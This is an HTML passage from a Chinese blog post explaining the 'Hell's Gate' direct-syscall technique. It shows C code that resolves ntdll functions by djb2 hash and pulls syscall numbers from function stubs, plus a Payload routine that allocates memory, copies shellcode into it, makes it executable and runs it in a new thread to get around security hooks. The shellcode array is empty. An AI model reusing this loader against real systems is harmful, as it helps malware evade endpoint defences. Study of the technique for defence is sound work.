</span><span style="color:#75715e"></span>	ImageBase <span style="color:#f92672">=</span> (PBYTE)pLoadModule<span style="color:#f92672">-&gt;</span>DllBase;	<span style="color:#75715e">// 获取到dll的地址	
</span><span style="color:#75715e"></span>
	Dos <span style="color:#f92672">=</span> (PIMAGE_DOS_HEADER)ImageBase;		<span style="color:#75715e">// 定位dos头
</span><span style="color:#75715e"></span>	<span style="color:#66d9ef">if</span> (Dos<span style="color:#f92672">-&gt;</span>e_magic <span style="color:#f92672">!=</span> IMAGE_DOS_SIGNATURE)	<span style="color:#75715e">// 判断是不是dos头
</span><span style="color:#75715e"></span>		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>;
	Nt <span style="color:#f92672">=</span> (PIMAGE_NT_HEADERS)((PBYTE)Dos <span style="color:#f92672">+</span> Dos<span style="color:#f92672">-&gt;</span>e_lfanew);	<span style="color:#75715e">// 定位PE头
</span><span style="color:#75715e"></span>	File <span style="color:#f92672">=</span> (PIMAGE_FILE_HEADER)(ImageBase <span style="color:#f92672">+</span> (Dos<span style="color:#f92672">-&gt;</span>e_lfanew <span style="color:#f92672">+</span> <span style="color:#66d9ef">sizeof</span>(DWORD)));	<span style="color:#75715e">// 标准PE头, 这里用&amp;Nt-&gt;FileHeader也可以
</span><span style="color:#75715e"></span>	Optional <span style="color:#f92672">=</span> (PIMAGE_OPTIONAL_HEADER)((PBYTE)File <span style="color:#f92672">+</span> <span style="color:#66d9ef">sizeof</span>(IMAGE_FILE_HEADER));	<span style="color:#75715e">// 拓展PE头,&amp;Nt-&gt;OptionalHeader
</span><span style="color:#75715e"></span>	ExportTable <span style="color:#f92672">=</span> (PIMAGE_EXPORT_DIRECTORY)(ImageBase <span style="color:#f92672">+</span> Optional<span style="color:#f92672">-&gt;</span>DataDirectory[<span style="color:#ae81ff">0</span>].VirtualAddress);		<span style="color:#75715e">// 导出表
</span><span style="color:#75715e"></span>
	PDWORD pdwAddressOfFunctions <span style="color:#f92672">=</span> (PDWORD)((PBYTE)(ImageBase <span style="color:#f92672">+</span> ExportTable<span style="color:#f92672">-&gt;</span>AddressOfFunctions));		<span style="color:#75715e">// 导出函数地址表
</span><span style="color:#75715e"></span>	PDWORD pdwAddressOfNames <span style="color:#f92672">=</span> (PDWORD)((PBYTE)ImageBase <span style="color:#f92672">+</span> ExportTable<span style="color:#f92672">-&gt;</span>AddressOfNames);				<span style="color:#75715e">// 导出函数名字表
</span><span style="color:#75715e"></span>	PWORD pwAddressOfNameOrdinales <span style="color:#f92672">=</span> (PWORD)((PBYTE)ImageBase <span style="color:#f92672">+</span> ExportTable<span style="color:#f92672">-&gt;</span>AddressOfNameOrdinals);	<span style="color:#75715e">// 导出函数序号表
</span><span style="color:#75715e"></span>
	<span style="color:#66d9ef">for</span> (WORD cx <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; cx <span style="color:#f92672">&lt;</span> ExportTable<span style="color:#f92672">-&gt;</span>NumberOfNames; cx<span style="color:#f92672">++</span>)
	{
		PCHAR pczFunctionName <span style="color:#f92672">=</span> (PCHAR)((PBYTE)ImageBase <span style="color:#f92672">+</span> pdwAddressOfNames[cx]);		<span style="color:#75715e">// 函数名字
</span><span style="color:#75715e"></span>		PVOID pFunctionAddress <span style="color:#f92672">=</span> (PBYTE)ImageBase <span style="color:#f92672">+</span> pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];	<span style="color:#75715e">// 序号表的值为地址表的索引
</span><span style="color:#75715e"></span>		printf(<span style="color:#e6db74">&#34;Function Name:%s</span><span style="color:#ae81ff">\t</span><span style="color:#e6db74">Function Address:%p</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, pczFunctionName, pFunctionAddress);
	}
}

<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>() {
	GetPeHeader();
	system(<span style="color:#e6db74">&#34;pause&#34;</span>);
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>;
}
</code></pre></div><p>先定义了一个<code>LDR_MODULE</code>的结构体，存放<code>_LDR_DATA_TABLE_ENTRY</code></p>
<p>因为是直接从内存中读取的嘛，所以也不需要搞偏移</p>
<p><a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FStructures%2FLDR_MODULE.html">http://undocumented.ntinternals.net/index.html?page=UserMode%2FStructures%2FLDR_MODULE.html</a></p>
<h2 id="地狱之门">地狱之门</h2>
<p>前置知识过完了，就开始解读地狱之门的代码了</p>
<p>代码里先定义了俩结构体</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_VX_TABLE_ENTRY</span> {	
	PVOID   pAddress;		<span style="color:#75715e">// 指向内存模块的函数地址指针
</span><span style="color:#75715e"></span>	DWORD64 dwHash;			<span style="color:#75715e">// 函数Hash
</span><span style="color:#75715e"></span>	WORD    wSystemCall;	<span style="color:#75715e">// Syscall Number
</span><span style="color:#75715e"></span>} VX_TABLE_ENTRY, <span style="color:#f92672">*</span> PVX_TABLE_ENTRY;

<span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_VX_TABLE</span> {	<span style="color:#75715e">// 用来存放每一个系统调用的函数
</span><span style="color:#75715e"></span>	VX_TABLE_ENTRY NtAllocateVirtualMemory;
	VX_TABLE_ENTRY NtProtectVirtualMemory;
	VX_TABLE_ENTRY NtCreateThreadEx;
	VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, <span style="color:#f92672">*</span> PVX_TABLE;
</code></pre></div><p>然后又定义了几个函数原型</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">PTEB <span style="color:#a6e22e">RtlGetThreadEnvironmentBlock</span>();
BOOL <span style="color:#a6e22e">GetImageExportDirectory</span>(
	_In_ PVOID                     pModuleBase,
	_Out_ PIMAGE_EXPORT_DIRECTORY<span style="color:#f92672">*</span> ppImageExportDirectory
);
BOOL <span style="color:#a6e22e">GetVxTableEntry</span>(
	_In_ PVOID pModuleBase,
	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
	_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL <span style="color:#a6e22e">Payload</span>(
	_In_ PVX_TABLE pVxTable
);
PVOID <span style="color:#a6e22e">VxMoveMemory</span>(
	_Inout_ PVOID dest,
	_In_    <span style="color:#66d9ef">const</span> PVOID src,
	_In_    SIZE_T len
);
</code></pre></div><p>extern 定义了俩函数，是存放在<code>hellsgate.asm</code>里的</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#66d9ef">extern</span> VOID <span style="color:#a6e22e">HellsGate</span>(WORD wSystemCall);
<span style="color:#66d9ef">extern</span> <span style="color:#a6e22e">HellDescent</span>();
</code></pre></div><p><img src="/images/HellsGate/image-20220325085154625.png" alt="image-20220325085154625"></p>
<p><code>HellsGate</code>：用来设置调用号</p>
<p><code>HellDescent</code>：用来模拟系统调用进行调用</p>
<p>然后进入到main方法，定义了TEB，又从TEB里找到了PEB，再解析导出表，进行判断</p>
<p><img src="/images/HellsGate/image-20220325085215881.png" alt="image-20220325085215881"></p>
<p>接下来就是定义上面结构体里，给它Api的Hash，Api的Hash就是<code>djb2</code>函数生成的</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">VX_TABLE Table <span style="color:#f92672">=</span> { <span style="color:#ae81ff">0</span> };
Table.NtAllocateVirtualMemory.dwHash <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xf5bd373480a6b89b</span>;
<span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>GetVxTableEntry(pLdrDataEntry<span style="color:#f92672">-&gt;</span>DllBase, pImageExportDirectory, <span style="color:#f92672">&amp;</span>Table.NtAllocateVirtualMemory))
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0x1</span>;

Table.NtCreateThreadEx.dwHash <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x64dc7db288c5015f</span>;
<span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>GetVxTableEntry(pLdrDataEntry<span style="color:#f92672">-&gt;</span>DllBase, pImageExportDirectory, <span style="color:#f92672">&amp;</span>Table.NtCreateThreadEx))
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0x1</span>;

Table.NtProtectVirtualMemory.dwHash <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x858bcb1046fb6a37</span>;
<span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>GetVxTableEntry(pLdrDataEntry<span style="color:#f92672">-&gt;</span>DllBase, pImageExportDirectory, <span style="color:#f92672">&amp;</span>Table.NtProtectVirtualMemory))
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0x1</span>;

Table.NtWaitForSingleObject.dwHash <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xc6a2fa174e551bcb</span>;
<span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>GetVxTableEntry(pLdrDataEntry<span style="color:#f92672">-&gt;</span>DllBase, pImageExportDirectory, <span style="color:#f92672">&amp;</span>Table.NtWaitForSingleObject))
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0x1</span>;
</code></pre></div><p>直接测试下是不是<code>djb2</code>生成的</p>
<p><img src="/images/HellsGate/image-20220325085253695.png" alt="image-20220325085253695"></p>
<p>然后就得重点看下<code>GetVxTableEntry</code>函数，因为这步就是取Syscall Number的</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">BOOL <span style="color:#a6e22e">GetVxTableEntry</span>(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions <span style="color:#f92672">=</span> (PDWORD)((PBYTE)pModuleBase <span style="color:#f92672">+</span> pImageExportDirectory<span style="color:#f92672">-&gt;</span>AddressOfFunctions);
	PDWORD pdwAddressOfNames <span style="color:#f92672">=</span> (PDWORD)((PBYTE)pModuleBase <span style="color:#f92672">+</span> pImageExportDirectory<span style="color:#f92672">-&gt;</span>AddressOfNames);
	PWORD pwAddressOfNameOrdinales <span style="color:#f92672">=</span> (PWORD)((PBYTE)pModuleBase <span style="color:#f92672">+</span> pImageExportDirectory<span style="color:#f92672">-&gt;</span>AddressOfNameOrdinals);

	<span style="color:#66d9ef">for</span> (WORD cx <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; cx <span style="color:#f92672">&lt;</span> pImageExportDirectory<span style="color:#f92672">-&gt;</span>NumberOfNames; cx<span style="color:#f92672">++</span>) {
		PCHAR pczFunctionName <span style="color:#f92672">=</span> (PCHAR)((PBYTE)pModuleBase <span style="color:#f92672">+</span> pdwAddressOfNames[cx]);
		PVOID pFunctionAddress <span style="color:#f92672">=</span> (PBYTE)pModuleBase <span style="color:#f92672">+</span> pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		<span style="color:#66d9ef">if</span> (djb2(pczFunctionName) <span style="color:#f92672">==</span> pVxTableEntry<span style="color:#f92672">-&gt;</span>dwHash) {
			pVxTableEntry<span style="color:#f92672">-&gt;</span>pAddress <span style="color:#f92672">=</span> pFunctionAddress;

			<span style="color:#75715e">// Quick and dirty fix in case the function has been hooked
</span><span style="color:#75715e"></span>			WORD cw <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
			<span style="color:#66d9ef">while</span> (TRUE) {
				<span style="color:#75715e">// check if syscall, in this case we are too far
</span><span style="color:#75715e"></span>				<span style="color:#66d9ef">if</span> (<span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x0f</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> cw <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x05</span>)
					<span style="color:#66d9ef">return</span> FALSE;

				<span style="color:#75715e">// check if ret, in this case we are also probaly too far
</span><span style="color:#75715e"></span>				<span style="color:#66d9ef">if</span> (<span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xc3</span>)
					<span style="color:#66d9ef">return</span> FALSE;

				<span style="color:#75715e">// First opcodes should be :
</span><span style="color:#75715e"></span>				<span style="color:#75715e">//    MOV R10, RCX
</span><span style="color:#75715e"></span>				<span style="color:#75715e">//    MOV RCX, &lt;syscall&gt;
</span><span style="color:#75715e"></span>				<span style="color:#66d9ef">if</span> (<span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x4c</span>
					<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x8b</span>
					<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span> <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xd1</span>
					<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">3</span> <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xb8</span>
					<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">6</span> <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x00</span>
					<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">7</span> <span style="color:#f92672">+</span> cw) <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x00</span>) {
					BYTE high <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">5</span> <span style="color:#f92672">+</span> cw);
					BYTE low <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>((PBYTE)pFunctionAddress <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">+</span> cw);
					pVxTableEntry<span style="color:#f92672">-&gt;</span>wSystemCall <span style="color:#f92672">=</span> (high <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">8</span>) <span style="color:#f92672">|</span> low;
					<span style="color:#66d9ef">break</span>;
				}

				cw<span style="color:#f92672">++</span>;
			};
		}
	}

	<span style="color:#66d9ef">return</span> TRUE;
}
</code></pre></div><p>三个参数</p>
<p><code>pModuleBase</code>：ntdll的地址</p>
<p><code>pImageExportDirectory</code>：导出表</p>
<p><code>pVxTableEntry</code>：需要找到函数的<code>_VX_TABLE_ENTRY</code>结构</p>
<p>先定位了函数名称表地址，函数地址表的地址，函数序号表的地址</p>
<p><img src="/images/HellsGate/image-20220325085336858.png" alt="image-20220325085336858"></p>
<p>然后遍历导出表，根据API的Hash取到对应的API</p>
<p>然后把地址 存到那个结构里</p>
<p><img src="/images/HellsGate/image-20220325085349298.png" alt="image-20220325085349298"></p>
<p>接着判断了下所在位置</p>
<p><img src="/images/HellsGate/image-20220325085403800.png" alt="image-20220325085403800"></p>
<p>其实这里 这样看 更清楚</p>
<p><img src="/images/HellsGate/image-20220325085415026.png" alt="image-20220325085415026"></p>
<p>这里的if其实就是为了判断</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-asm" data-lang="asm"><span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">r10</span>,<span style="color:#66d9ef">rcx</span>
<span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">eax</span>,*
</code></pre></div><p>然后判断成功了，就左移搞一个0地址，与本来的syscall number进行或运算</p>
<p><img src="/images/HellsGate/image-20220325085453110.png" alt="image-20220325085453110"></p>
<p><img src="/images/HellsGate/image-20220325085504593.png" alt="image-20220325085504593"></p>
<p>最后就赋值了<code>_VX_TABLE_ENTRY</code>结构里的<code>wSystemCall</code></p>
<p>main函数里的几个<code>GetVxTableEntry</code>就是取<code>Syscall Number</code></p>
<p>最后调用了Payload，就是执行我们所需要的API。把那个大结构体传过去</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">BOOL <span style="color:#a6e22e">Payload</span>(PVX_TABLE pVxTable) {
	NTSTATUS status <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x00000000</span>;
	<span style="color:#66d9ef">char</span> shellcode[] <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>;

	<span style="color:#75715e">// Allocate memory for the shellcode
</span><span style="color:#75715e"></span>	PVOID lpAddress <span style="color:#f92672">=</span> NULL;
	SIZE_T sDataSize <span style="color:#f92672">=</span> <span style="color:#66d9ef">sizeof</span>(shellcode);
	HellsGate(pVxTable<span style="color:#f92672">-&gt;</span>NtAllocateVirtualMemory.wSystemCall);		<span style="color:#75715e">// 设置调用号
</span><span style="color:#75715e"></span>	status <span style="color:#f92672">=</span> HellDescent((HANDLE)<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#f92672">&amp;</span>lpAddress, <span style="color:#ae81ff">0</span>, <span style="color:#f92672">&amp;</span>sDataSize, MEM_COMMIT, PAGE_READWRITE);	<span style="color:#75715e">// 利用NtAllocateVirtualMemory进行申请内存  (HANDLE)-1就是GetCurrentProcess()
</span><span style="color:#75715e"></span>
	<span style="color:#75715e">// Write Memory
</span><span style="color:#75715e"></span>	VxMoveMemory(lpAddress, shellcode, <span style="color:#66d9ef">sizeof</span>(shellcode));

	<span style="color:#75715e">// Change page permissions
</span><span style="color:#75715e"></span>	ULONG ulOldProtect <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
	HellsGate(pVxTable<span style="color:#f92672">-&gt;</span>NtProtectVirtualMemory.wSystemCall);
	status <span style="color:#f92672">=</span> HellDescent((HANDLE)<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#f92672">&amp;</span>lpAddress, <span style="color:#f92672">&amp;</span>sDataSize, PAGE_EXECUTE_READ, <span style="color:#f92672">&amp;</span>ulOldProtect);

	<span style="color:#75715e">// Create thread
</span><span style="color:#75715e"></span>	HANDLE hHostThread <span style="color:#f92672">=</span> INVALID_HANDLE_VALUE;
	HellsGate(pVxTable<span style="color:#f92672">-&gt;</span>NtCreateThreadEx.wSystemCall);
	status <span style="color:#f92672">=</span> HellDescent(<span style="color:#f92672">&amp;</span>hHostThread, <span style="color:#ae81ff">0x1FFFFF</span>, NULL, (HANDLE)<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

	<span style="color:#75715e">// Wait for 1 seconds
</span><span style="color:#75715e"></span>	LARGE_INTEGER Timeout;
	Timeout.QuadPart <span style="color:#f92672">=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">50000000</span>;
	HellsGate(pVxTable<span style="color:#f92672">-&gt;</span>NtWaitForSingleObject.wSystemCall);
	status <span style="color:#f92672">=</span> HellDescent(hHostThread, TRUE, <span style="color:#f92672">&amp;</span>Timeout);

	<span style="color:#66d9ef">return</span> TRUE;
}
</code></pre></div><p>这里面就是设置调用号，然后进行系统调用</p>
<p>最后运行下 尝试效果</p>
<p><img src="/images/HellsGate/image-20220325085552422.png" alt="image-20220325085552422"></p>
<h2 id="参考资料">参考资料</h2>
<ul>
<li>
<p><a href="https://xz.aliyun.com/t/10478">https://xz.aliyun.com/t/10478</a></p>
</li>
<li>
<p><a href="https://www.anquanke.com/post/id/267345">https://www.anquanke.com/post/id/267345</a></p>
</li>
</ul>

        </div>

        <div class="row middle-xs">
          <div class="col-xs-12">
            
          </div>
        </div>
        
          <div class="row">
            <div class="col-xs-12">
              
            </div>
          </div>

          



          
          
          <div style="height: 50px;"></div>
          
          <div class="post-comments">
            <div id="disqus_thread"></div>
<script>
  window.addEventListener("load", () => {
    (function() {
      
      var d = document,
        s = d.createElement("script");
      s.src = "https://joway.disqus.com/embed.js";
      s.setAttribute("data-timestamp", +new Date());
      (d.head || d.body).appendChild(s);
    })();
  });
</script>
<noscript
  >Please enable JavaScript to view the
  <a href="https://disqus.com/?ref_noscript"
    >comments powered by Disqus.</a
  ></noscript
>

          </div>
          
        

        <div class="site-footer">
  
  
</div>

      </div>
    </div>
  </article>

  

<script>
  
  
    
    
  
</script>

  

</body>

</html>